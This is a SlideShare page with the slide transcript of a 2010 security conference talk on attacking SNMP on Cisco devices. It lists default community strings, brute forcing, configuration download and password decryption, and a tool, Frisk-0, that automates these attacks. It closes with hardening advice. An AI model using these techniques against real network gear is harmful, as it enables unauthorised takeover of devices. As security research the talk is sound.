SNMP : Simple Network Mediated (Cisco) Pwnage
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

SNMP : Simple Network Mediated (Cisco) Pwnage

on

  • 1,666 views

Presentation by Grorg Christian Pranschkle at ZaCon 2 in 2010. ...

Presentation by Grorg Christian Pranschkle at ZaCon 2 in 2010.

This presentation is about SNMP security The presentation begins with an overview of SNMP. SNMP security weaknesses and SNMP security in cisco apps are discussed. Frisk-0 a tool for SNMP Hacking developed by the presenter is also discussed.

Statistics

Views

Total Views
1,666
Views on SlideShare
1,611
Embed Views
55

Actions

Likes
0
Downloads
25
Comments
0

5 Embeds 55

http://www.sensepost.com 39
http://research.sensepost.com 11
http://localhost 2
http://sensepost.com 2
http://www.sensepost.co.za 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

SNMP : Simple Network Mediated (Cisco) Pwnage Presentation Transcript

  • 1. SNMPSimple Network Mediated (Cisco) Pwnage Georg-Christian Pranschke 9 October 2010
  • 2. `whoami`  george@sensepost.com   “Cheorchie”
  • 3. Agenda  How it all began…  SNMP ?  SNMP from a Security Perspective  SNMP on Cisco Appliances  Exploiting SNMP Misconfigurations  Frisk-0  Secure your SNMP enabled devices  Questions
  • 4. A Long Time Ago…
  • 5. How it all began…
  • 6. SNMP ?
  • 7. SNMP ?  Simple Network Management Protocol   Monitor and manage devices on the network   Routers   Switches   Bridges   Hubs   IP phones and cameras   Printers   Computers
  • 8. SNMP ?  UDP: 161 / 162  Manager  Agent  Concepts   MIB – Message Information Block   OID – Object Identifier   PDU – Protocol Data Unit  Versions   1 and 2c vs 3
  • 9. SNMP ?  Community strings   Think passwords   Read/write
  • 10. SNMP from a Security Perspective
  • 11. SNMP from a Security Perspective  Plain-text protocol  UDP   Spoofing  Get/Set-responses contain community string  Community Strings   Defaults: public, private, admin, snmp, snmpd …   Weak Communities: 3 characters !!!   Reuse   Community schemes  User awareness
  • 12. SNMP from a Security Perspective  Information Disclosure   Internal IP Addresses   Routing Information   Running Processes   Running Services   Installed Software   Usernames   Hardware  Compromise
  • 13. Cisco
  • 14. Cisco Appliances S N M P TELNET SSH H T T P
  • 15. Brute Forcing Cisco Appliances  TELNET   Often only password required   Only three tries – then reconnect   Enable password needs to be brute forced as well  SSH   Needs username and password (ssh -1)   Only three tries per connection   Enable password needs to be brute forced as well  HTTP(S)   Basic Authentication   Fastest so far   No enable password
  • 16. Brute Forcing Cisco Appliances  SNMP   Almost as fast as we can send UDP packets !   Just community string needed !   Privileged access to the device !
  • 17. SNMP on Cisco Appliances  Remote Configuration through SNMP   Setting OIDs   Configuration up- and downloads via TFTP   Running config vs Startup config
  • 18. The Vigenere Cipher  Variation of a Caesar Cipher   Why such a weak cipher ?   Obfuscation at best
  • 19. Exploiting SNMP Misconfigurations
  • 20. If the RW community is known…
  • 21. Frisk-0
  • 22. The Lab Environment
  • 23. Frisk-0  ”Rogue Management Interface”   Brute forces community strings   Downloads Running and Startup configurations   Extracts and decrypts all passwords and hashes   Batch mode   From targets file   Network ranges   Spoofing capabilities   “Configlets” (enable TELNET / reset passwords)  Fully automated and unattended
  • 24. Frisk-0
  • 25. The GREnd Finale  GRE – Generic Routing Encapsulation
  • 26. Secure your SNMP enabled devices
  • 27. Secure Your SNMP Enabled Devices  Do you really need SNMP ?  Do you really need a RW community ?  Set strong community strings   40+ characters ? Why not!  Access-lists   SNMP   TFTP ! (spoofing)   UDP
  • 28. Questions ?